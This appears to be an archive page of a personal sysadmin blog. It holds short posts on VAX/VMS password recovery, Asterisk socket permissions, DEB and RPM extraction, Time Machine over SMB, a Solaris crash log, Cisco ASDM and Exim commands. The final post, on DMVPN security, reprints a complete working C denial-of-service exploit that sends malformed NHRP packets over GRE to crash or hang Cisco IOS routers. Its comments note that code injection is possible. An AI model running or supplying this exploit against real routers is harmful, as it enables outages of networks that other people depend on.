the up position so that the VAX uses the serial console instead of the
graphics console.

Then, load up your favourite terminal application, set the speed to 9600
baud, make sure hardware handshaking is off, and see if you can talk to
the VAX.

VAX – MMJ DEC423 Pinout Read More »

My first VAX and VMS system

3 days ago I find a nice VAX Station 4000/60 on ebay for only 41 Euro (about 60 Dollars), obviously I bought it, and today delivery boy knock my door!

I paste the command/console output of the recovery procedure:

KA46-A V1.4-38E-V4.2
08-00-2B-92-4E-C7
24MB

?? 001 9 NI 0172

>>> sh config

KA46-A V1.4-38E-V4.2
08-00-2B-92-4E-C7
24MB

DEVNBR DEVNAM INFO
------ -------- --------------------------
1 NVR OK
2 LCG OK
HR - 8 PLN FB - V1.2
3 DZ OK
4 CACHE OK
5 MEM OK
24MB = SY=8MB, S0/1=8MB, S2/3=8MB, S4/5=0MB
6 FPU OK
7 IT OK
8 SYS OK
9 NI ?? 001 0172
10 SCSI OK
3-L0-RZ26B 6-INITR
11 AUD OK

>>> ?

BOOT [/[R5:]<bflg>] [<ddau>[:]]
CONTINUE
DEPOSIT [{ /B | /W | /L | /Q | /A }] [{ /P | /V | /I }] [/G] [/U] [/N:<n>]
[{ <addr> | <sym> | + | - | * | @ } [<datum>]]
EXAMINE [{ /B | /W | /L | /Q | /A }] [{ /P | /V | /I }] [/G] [/U] [/N:<n>]
[{ <addr> | <sym> | + | - | * | @ }]
FIND [{ /MEMORY | /RPB }]
HALT
HELP
INITIALIZE
LOGIN
REPEAT <cmd>
SET BOOT <ddau>
SET BFLG <bflg>
SET DIAGENV <1-3>
SET FBOOT <0-1>
SET HALT <1-3>
SET KBD <0-15>
SET MOP <0-1>
SET PSE <0-1>
SET PSWD
SET SCSI <0-7>
SET TRIG <0-1>
SHOW { BOOT | BFLG | CONFIG | DEV | DIAGENV | FBOOT | ETHER | ERROR |
ESTAT | HALT | KBD | MEM | MOP | PSE | SCSI | TRIG }
START <addr>
TEST [/UTIL] <devnam | devnbr>
UNJAM
X <addr> <cnt> ...
?

>>> B/1

-DKA300
SYSBOOT> SET/STARTUP OPA0:

SYSBOOT> SET WINDOWS_SYSTEM 0

%SYSBOOT-E-NOPARAM, no such parameter WINDOWS_SYSTEM
SYSBOOT> SET WRITESYSPARAMS 0

SYSBOOT> CONTINUE

VAX/VMS Version V5.5-2H4 Major version id = 1 Minor version id = 0

PLEASE ENTER DATE AND TIME (DD-MMM-YYYY HH:MM) 27-NOV-2009 3:51
$

$ SPAWN
SPAWN
%DCL-S-SPAWNED, process SYSTEM_1 spawned
%DCL-S-ATTACHED, terminal now attached to process SYSTEM_1
$ @SYS$SYSTEM:STARTUP
$! Copyright (c) 1993 Digital Equipment Corporation. All rights reserved.

%STDRV-I-STARTUP, VMS startup begun at 27-NOV-2009 04:00:59.19

The VAX/VMS system is now executing the system startup procedure.

%SET-I-NEWAUDSRV, identification of new audit server process is 00000088

The VAX/VMS system is now executing the site-specific startup commands.

%RUN-S-PROC_ID, identification of created process is 0000008C
%NCP-W-FILOPE, File open error , Permanent database

%NML-E-OPENOUT, error opening SYS$SYSROOT:[SYSEXE]NETLOGING.DAT; as output
-RMS-F-PLV, unsupported prolog version
%NCP-W-OPEFAI, Operation failure

%SYSTEM-F-TIMEOUT, device timeout
, timeout
, unit is active
, fatal hardware error
%NCP-W-UNRCMP, Unrecognized component , Circuit
Circuit = SVA-0

%NCP-I-NOINFO, No information in database
%RUN-S-PROC_ID, identification of created process is 0000008D
Job NCPSTART (queue SYS$BATCH, entry 1) started on SYS$BATCH
%RUN-S-PROC_ID, identification of created process is 0000008F
%SET-I-INTSET, login interactive limit = 20, current interactive value = 1
27-NOV-2009 04:03:07
Process SYSTEM_1 logged out at 27-NOV-2009 04:03:08.62

Accounting information:
Buffered I/O count: 3431 Peak working set size: 888
Direct I/O count: 1440 Peak page file size: 3806
Page faults: 16606 Mounted volumes: 0
Charged CPU time: 0 00:00:22.71 Elapsed time: 0 00:02:18.06
%DCL-S-RETURNED, control returned to process STARTUP
$ SET DEFAULT SYS$SYSTEM
SET DEFAULT SYS$SYSTEM
$ RUN SYS$SYSTEM:AUTHORIZE
RUN SYS$SYSTEM:AUTHORIZE
UAF> MODIFY SYSTEM /PASSWORD=system
%UAF-I-MDFYMSG, user record(s) updated
UAF> EXIT
%UAF-I-DONEMSG, system authorization file modified
%UAF-I-RDBNOMODS, no modifications made to rights data base
$ LOGOUT
LOGOUT
SYSTEM job terminated at 27-NOV-2009 04:04:26.81

Accounting information:
Buffered I/O count: 99 Peak working set size: 1056
Direct I/O count: 46 Peak page file size: 3978
Page faults: 471 Mounted volumes: 0
Charged CPU time: 0 00:00:00.41 Elapsed time: 0 00:05:33.58

Welcome to VAX/VMS V5.5-2H4

Username:

My first VAX and VMS system Read More »

Asterisk – permissions and ownership for the socket console

If you need to give asterisk operational permission to a simple user on linux system, first of all you can add it on asterisk group, then you can edit “asterisk.conf” usually on /etc/asterisk/ and give rwx permission to asterisk group like this (add if they don’t exist):

[files]
astctlpermissions => 770
astctlowner => asterisk
astctlgroup => asterisk
astctl => /var/run/asterisk/asterisk.ctl

Restart asterisk to apply changes.

Common error (wrong socket permission):

[leo@srv01 ~]$ /usr/sbin/asterisk -r
Asterisk 1.4.22-4 RPM by vc-rpms@voipconsulting.nl, Copyright (C) 1999 - 2008 Digium, Inc. and others.
Created by Mark Spencer
Asterisk comes with ABSOLUTELY NO WARRANTY; type 'core show warranty' for details.
This is free software, with components licensed under the GNU General Public
License version 2 and other licenses; you are welcome to redistribute it under
certain conditions. Type 'core show license' for details.
=========================================================================
Unable to connect to remote asterisk (does /var/run/asterisk/asterisk.ctl exist?)
[leo@srv01 ~]$

Asterisk – permissions and ownership for the socket console Read More »

Extract files from DEB package

Some day ago, I wrote about RPM extraction, today I need content of DEB packcage, on the contrary of rpm systems debian package manager allow to extract natively by this command:

#dpkg-deb -x somepackage.i386.deb

But my problem is different, I not using Debian sytem, fortunately DEB files are “ar” archives, which contain three files:
– debian-binary
– control.tar.gz
– data.tar.gz

first, extract “ar” archive with this simple command:

# ar vx somepackage.i386.deb

then extract the contents of data.tar.gz using tar:

# tar -xzvf data.tar.gz

Or, if you want, you can made in one step:

# ar p somepackage.i386.deb data.tar.gz | tar zx

Extract files from DEB package Read More »

Mac OS X – Time Machine network backup without Time Capsule

From OS X 10.5 (Leopard) Apple introduced Time Machine: a great combination of rsync/rsnapshot and a beautiful user interface.
Time Machine works in two modes: 1. local volume on local area or 2. Time Capsule over network.
Now I don’t wanna buy another box with apple logo over it for much $$$ when I have a lot of file servers on my network.

Now I explain a few hoops to get this system to work:

First: persuade Time Machine to see the SMB share as a Time Machine destination by activating the unsupported network drives feature by this console command:

# defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1

Second: set up the file server with SMB dedicated share to Time Machine, create an appropriate disk image locally (see below) and copy it into share.

To create the disk image, you’ll need to find out two pieces of information about the computer you want to backup: its Computer Name and its Ethernet ID (Ethernet MAC address). The Computer Name is the one that you set in the Sharing System Preferences pane. For example my is “LeoBook2”.

You can get the Ethernet ID by this command (use wired mac nic even if you’ll be using wifi connection):

# ifconfig en0 | grep ether | sed s/://g | sed s/ether//

Compose image name following this syntax:
Computer Name, followed by an underscore, followed by the Ethernet ID without the colons, followed by .sparsebundle (Ex. “LeoBook2_000d9358ca26.sparsebundle”).

Now go to Terminal and type the following commands:

# DISK_IMAGE_NAME="LeoBook2_000d9358ca26.sparsebundle"
# DISK_SIZE=200000
# hdiutil create -library SPUD -megabytes $DISK_SIZE -fs HFS+J -type SPARSEBUNDLE -volname "$DISK_IMAGE_NAME" "$DISK_IMAGE_NAME"

After you’ve run this command, you should end up with a disk image in your Home. It looks like a single file, but it’s actually a directory (just like a application). Don’t forget to copy this disk image to the appropriate share on your server. Just dragging and dropping from the Finder should work fine.

Now you are able to use the share as Time Machine backup volume.

Have a fun
Leo

Mac OS X – Time Machine network backup without Time Capsule Read More »

Extract files from RPM package

There is no direct RPM option available via rpm command to extract an RPM file. But there is a small utility available called rpm2cpio. It Extract cpio archive from RPM Package Manager (RPM) package.
Example extract RPM file using rpm2cpio and cpio command:

# rpm2cpio somepackage.x86_64.rpm | cpio -idmv

Output of rpm2cpio piped to cpio command with following options:
i: Restore archive
d: Create leading directories where needed
m: Retain previous file modification times when creating files
v: Verbose

Extract files from RPM package Read More »

Sun Ultra10 – Crash/Recovery

Yesterday after 1 year and 2 month uptime, my poor Sun Ultra 10 (Solaris OS10) running into home server room, was crashed..

I’m so sick, here the paste of console recovery procedure:

Type  'go' to resume
ok ?
1000000
Stack Underflow
ok sync

panic[cpu0]/thread=2a100057ca0: sync initiated

sched: software trap 0x7f
pid=0, pc=0xf0050c7c, sp=0x2a100056e81, tstate=0x8800001401, context=0x0
g1-g7: 104da44, 0, 183f000, 0, 1082400, 5, 2a100057ca0

00000000fffa9d10 unix:sync_handler+138 (fffe5718, 1000000, 1, 1083400, 1, 181500                                             0)
  %l0-3: 00000000018621b0 0000000001862000 000000000000017f 0000000001845800
  %l4-7: 0000000000000000 000000000183f000 0000000000000009 0000000001810400
00000000fffa9de0 unix:vx_handler+80 (fffe5718, 181dfe8, f0000000, fffe0000, 181e                                             0f0, f003bda1)
  %l0-3: 000000000181e0f0 0000000000000000 0000000000000001 0000000000000001
  %l4-7: 0000000001810c00 00000000f0000000 0000000001000000 0000000001018998
00000000fffa9e90 unix:callback_handler+20 (fffe5718, 1, 0, 0, 0, 0)
  %l0-3: 0000000000000016 00000000fffa9741 00000000f004a64c 00000000fffe0000
  %l4-7: 0000000000000016 0000000000000000 0000000000000000 000000000180c000

syncing file systems... 3 done
dumping to /dev/dsk/c0t0d0s7, offset 107413504, content: kernel
100% done: 15712 pages dumped, compression ratio 2.54, dump succeeded
rebooting...
Resetting ...

Sun Ultra 5/10 UPA/PCI (UltraSPARC-IIi 440MHz), No Keyboard
OpenBoot 3.25, 512 MB (50 ns) memory installed, Serial #15184795.
Ethernet address 8:0:20:e7:b3:9b, Host ID: 80e7b39b.

Rebooting with command: boot
Boot device: /pci@1f,0/pci@1,1/ide@3/disk@0,0:a  File and args:
SunOS Release 5.10 Version Generic_137111-06 64-bit
Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.
Use is subject to license terms.
Hostname: ultra10
Loading smf(5) service descriptions: 1/1
WARNING: svccfg import /var/svc/manifest/application/database/mysql.xml failed
svccfg import warnings. See /var/svc/log/system-manifest-import:default.log .
/dev/rdsk/c0t0d0s1 is clean

ultra10 console login: root
Password:
Sep 29 23:02:52 ultra10 login: ROOT LOGIN /dev/console
Last login: Tue Sep 29 22:21:42 from 192.168.2.15

Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
root@ultra10 ~ #

Sun Ultra10 – Crash/Recovery Read More »

Cisco – ASA/PIX enable ASDM

fw01a> enable
Password:
fw01a# configure terminal
fw01a(Config)# interface ethernet1
fw01a(Config-if)# nameif inside
fw01a(Config-if)# ip address 192.168.1.1 255.255.255.0
fw01a(Config-if)# no shutdown
fw01a(Config-if)#

Activate ASDM and enable http server.

fw01a(Config)# asdm image flash:/asdm.bin.
fw01a(Config)# http server enable.

Open a connection for your inside network.

fw01a(Config)# http 192.168.1.0 255.255.255.0 inside

Make sure all your config running properly.

fw01a(Config)# show running http
http server enabled
http 192.168.1.0 255.255.255.0 inside
fw01a(Config)#

Now your Cisco ASA/PIX can be access from your PC, open your web browser then enter this address https://192.168.1.1/admin

Cisco – ASA/PIX enable ASDM Read More »

Exim – Command

Some userfull Exim command:

exim -bp mailq — The mailq is relevant
as it gives your the email IDs.
exim -M emailID force delivery of one message
exim -qf Force another queue run
exim -qff Force another queue run and
attempt to flush frozen messages
exim -Mvl messageID View Log for message
exim -Mvb messageID View Body for message
exim -Mvh messageID View Header for message
exim -Mrm messageID ReMove message (no errors sent)
exim -Mg messageID Give up and fail message,
message bounces to sender

Exim – Command Read More »

Cisco DMVPN/NBMA – Security

I’m working on experimental wide lab network based on DMVPN/NBMA, with some friends, dynamic multipoing vpn is seem a great solution, looks like a cheap frame relay infrastructure over internet.

Now the problem: what about security?
especially in dynamical wan ip address envivorment durin spoke-spoke communication, is impossible define security rule on GRE level.

Solution:
I’m thinking about…

Only for testing purpose, I find this exploit:

[codesyntax lang="c"]
/******************************************************************************/
/* */
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */
/* */
/* Feel free to modify this code as you like, as long as you include the */
/* above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* Cisco bug ID: CSCin95836 */
/* */
/* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */
/* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */
/* subnetwork to determine the internetworking layer address and NBMA */
/* subnetwork addresses of the NBMA next hop towards the destination. */
/* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */
/* IPSEC. */
/* */
/* URLs: */
/* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */
/* - [RFC1701/GRE] http://rfc.net/rfc1701.html */
/* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */
/* logies_white_paper09186a008018983e.shtml */
/* */
/* This code was only tested on FreeBSD and Linux, no warranty is or will be */
/* provided. */
/* */
/* Vulnerable images (tested): */
/* */
/* - c7100-jk9o3s-mz.123-12e.bin */
/* - c7200-jk8o3s-mz.122-40.bin */
/* - c3640-js-mz.122-15.T17.bin */
/* (and many other IOS versions on different platforms) */
/* */
/* Vulnerable configuration on cisco IOS: */
/* */
/* interface Tunnel0 */
/* ip address 10.0.0.1 255.255.255.128 */
/* no ip redirects */
/* no ip proxy-arp */
/* ip mtu 1464 */
/* ip nhrp authentication mysecret */
/* ip nhrp network-id 1000 */
/* ip nhrp map multicast dynamic */
/* ip nhrp server-only */
/* ip nhrp holdtime 30 */
/* tunnel source FastEthernet0/0 */
/* tunnel mode gre multipoint */
/* tunnel key 123456789 */
/* */
/* This exploit works even if "ip nhrp authentication" is configured on the */
/* cisco router. You can also specify a GRE key (use 0 to disable this */
/* feature) if the GRE tunnel is protected. You don't need to know the */
/* NHRP network id (or any other configuration details, except the GRE key if */
/* it is set on the target router). */
/* */
/* NOTE: The exploit only seems to work, if a NHRP session between the target */
/* router and at least one client is established. */
/* */
/* Code injection is also possible (thanks to sky for pointing this out), but */
/* it is not very easy and depends heavily on the IOS version / platform. */
/* */
/* Example: */
/* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789 */
/* */
/* Router console output: */
/* */
/* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8 */
/* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000 */
/* <snip> */
/* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03 */
/* Cause 00000024 (Code 0x9): Breakpoint exception */
/* */
/* Writing crashinfo to bootflash:crashinfo_20070321-155011 */
/* === Flushing messages (16:50:12 CET Wed Mar 21 2007) === */
/* */
/* Router reboots or sometimes hangs ;) */
/* */
/* */
/* Workaround: Disable NHRP ;) */
/* */
/* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help */
/* regarding this issue. */
/* */
/* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */
/* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */
/* and #infiniteVOID */
/* */
/******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>

/* BSD */
#define _BSD

/* Header sizes */
#define IP_HDR_SIZE 20
#define GRE_HDR_SIZE 4
#define GRE_KEY_SIZE 4
#define NHRP_HDR_SIZE 62

/* Function prototypes */
int open_socket (void);
int close_socket (int);
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);
unsigned long get_int_ipv4 (char *);

/* Globals */
int sockfd;
int nhrp_req_id;

/* GRE header */
struct gre_h {
unsigned short flags; /* GRE flags */
unsigned short ptype; /* GRE protocol type */
unsigned int key; /* GRE key */
};

/* NHRP header */
struct nhrp_h {
/* NHRP fixed header (20 bytes) */
struct {
unsigned short afn; /* NHRP AFN */
unsigned short proto; /* NHRP protocol type */
unsigned int snap; /* NHRP SNAP */
unsigned short snapE:8; /* NHRP SNAP */
unsigned short hops:8; /* NHRP hop count */
unsigned short length; /* NHRP total length */
unsigned short checksum; /* NHRP checksum */
unsigned short mpoa_ext; /* NHRP MPOA extensions */
unsigned short version:8; /* NHRP version */
unsigned short type:8; /* NHRP type */
unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */
unsigned short nbma_sub:8; /* NHRP t/l of NBMA subaddr */
} fixed;

/* NHRP mandatory part */
struct {
unsigned short src_len:8; /* NHRP src protocol length */
unsigned short dst_len:8; /* NHRP dest protocol length */
unsigned short flags; /* NHRP flags */
unsigned int request_id; /* NHRP request ID */
unsigned long client_nbma; /* NHRP client NBMA address */
unsigned long client_nbma_sub; /* NHRP client NBMA subaddr */
unsigned long client_pro_addr; /* NHRP client protocol addr */
} mand;

/* NHRP client information entries (CIE) */
union {
struct {
unsigned short code:8; /* NHRP code */
unsigned short pref_len:8; /* NHRP prefix length */
unsigned short reserved; /* NHRP reserved */
unsigned short mtu; /* NHRP MTU */
unsigned short holding_time; /* NHRP holding time */
unsigned short len_client:8; /* NHRP t/l cl addr */
unsigned short len_client_sub:8;/* NHRP t/l cl sub */
unsigned short len_client_pro:8;/* NHRP t/l cl pro */
unsigned short preference:8; /* NHRP preference */
unsigned short ext; /* NHRP extension */
} cie;
};
};

/* Main function */
int main (int argc, char **argv) {
/* Check command line */
if(argc != 4) {
fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
fprintf(stderr, "------------------------------------------------\n");
fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n");
fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n");
exit(EXIT_FAILURE);
}

/* Check UID */
if(getuid() != 0 && geteuid() != 0) {
fprintf(stderr, "Error: Please run as root!\n");
exit(EXIT_FAILURE);
}

/* Open a socket */
sockfd = open_socket();

/* Send DoS packet */
send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3]));

/* Close the socket */
close_socket(sockfd);

exit(EXIT_SUCCESS);
}

/* Open the socket */
int open_socket (void)
{
int fd;
int one = 1;
void *ptr = &one;

/* Open the socket */
fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
if(fd < 0) {
fprintf(stderr, "Error: open_socket: Unable to open socket.\n");
exit(EXIT_FAILURE);
}

/* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */
/* Otherwise it would be done by the kernel. */
if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) {
fprintf(stderr, "Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}

#ifndef _BSD
if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) {
fprintf(stderr,"Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}
#endif

return(fd);
}

/* Close the socket */
int close_socket (int fd)
{
return(close(fd));
}

/* Resolve the hostname to IP address */
unsigned long resolve_ip (char *host)
{
struct in_addr addr;
struct hostent *host_ent;

if((addr.s_addr = inet_addr(host)) == -1) {
if(!(host_ent = gethostbyname(host)))
return(-1);

memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}

return(addr.s_addr);
}

/* Get IPv4 address of DEVICE */
unsigned long get_int_ipv4 (char *device)
{
int tmp_fd;
struct ifreq ifr;
struct sockaddr_in *sin;

tmp_fd = socket(PF_INET, SOCK_DGRAM, 0);

if(tmp_fd < 0) {
fprintf(stderr, "Error: get_int_ipv4: socket failed.\n");
exit(EXIT_FAILURE);
}

memset(&ifr, 0, sizeof(ifr));
sin = (struct sockaddr_in *) &ifr.ifr_addr;
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));

ifr.ifr_addr.sa_family = AF_INET;

if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) {
fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n");
exit(EXIT_FAILURE);
}

close(tmp_fd);
return(sin->sin_addr.s_addr);
}

/* Send NHRP packet */
int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip,
unsigned long gre_key)
{
struct ip ip_hdr;
struct ip *iphdr;
struct gre_h gre_hdr;
struct nhrp_h nhrp_hdr;
struct sockaddr_in sin;
unsigned int bytes = 0;
int GRE_SIZE = GRE_HDR_SIZE;

/* Packet buffer */
unsigned char *buf;

if(gre_key!=0)
GRE_SIZE+=GRE_KEY_SIZE;

/* Allocate some memory */
buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE);

if(buf < 0) {
fprintf(stderr, "Error: send_dos: malloc failed.\n");
exit(EXIT_FAILURE);
}

/* Increment NHRP request ID */
nhrp_req_id++;

/* IPv4 Header */
ip_hdr.ip_v = 4; /* IP version */
ip_hdr.ip_hl = 5; /* IP header length */
ip_hdr.ip_tos = 0x00; /* IP ToS */
ip_hdr.ip_len = htons(IP_HDR_SIZE +
GRE_SIZE +
NHRP_HDR_SIZE
); /* IP total length */
ip_hdr.ip_id = 0; /* IP identification */
ip_hdr.ip_off = 0; /* IP frag offset */
ip_hdr.ip_ttl = 64; /* IP time to live */
ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */
ip_hdr.ip_sum = 0; /* IP checksum */
ip_hdr.ip_src.s_addr = src_ip; /* IP source */
ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination */

/* GRE header */
if(gre_key != 0) {
gre_hdr.flags = htons(0x2000); /* GRE flags */
gre_hdr.key = htonl(gre_key); /* GRE key */
} else {
gre_hdr.flags = 0;
}

gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP) */

/* NHRP fixed header */
nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */
nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol type */
nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */
nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */
nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count */

/* DoS -> Set length to 0xFFFF */
nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */

/* Checksum can be incorrect */
nhrp_hdr.fixed.checksum = 0; /* NHRP checksum */

nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext */
nhrp_hdr.fixed.version = 1; /* NHRP version */
nhrp_hdr.fixed.type = 3; /* NHRP type */
nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l addr */
nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l sub */

/* NHRP mandatory part */
nhrp_hdr.mand.src_len = 4; /* NHRP src proto len */
nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto len */
nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */
nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID */
nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client addr */
nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub */
nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client proto */

/* NHRP client information entries (CIE) */
nhrp_hdr.cie.code = 0; /* NHRP code */
nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len */
nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved */
nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */
nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding time */
nhrp_hdr.cie.len_client = 0; /* NHRP t/l client */
nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */
nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */
nhrp_hdr.cie.preference = 0; /* NHRP preference */
nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type (ext)*/

/* Copy the IPv4 header to the buffer */
memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr));

/* Copy the GRE header to the buffer */
memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr));

/* Copy the NHRP header to the buffer */
memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr,
sizeof(nhrp_hdr));

/* Fix some BSD bugs */
#ifdef _BSD
iphdr = (struct ip *) buf;
iphdr->ip_len = ntohs(iphdr->ip_len);
iphdr->ip_off = ntohs(iphdr->ip_off);
#endif

memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr->ip_dst.s_addr;

printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
printf("------------------------------------------------\n");
printf("Sending DoS packet...");

/* Send the packet */
bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0,
(struct sockaddr *) &sin, sizeof(struct sockaddr));

printf("DONE (%d bytes)\n\n", bytes);

/* Free the buffer */
free(buf);

/* Return number of bytes */
return(bytes);
}

// milw0rm.com [2007-08-09]


[/codesyntax]

Download

Cisco DMVPN/NBMA – Security Read More »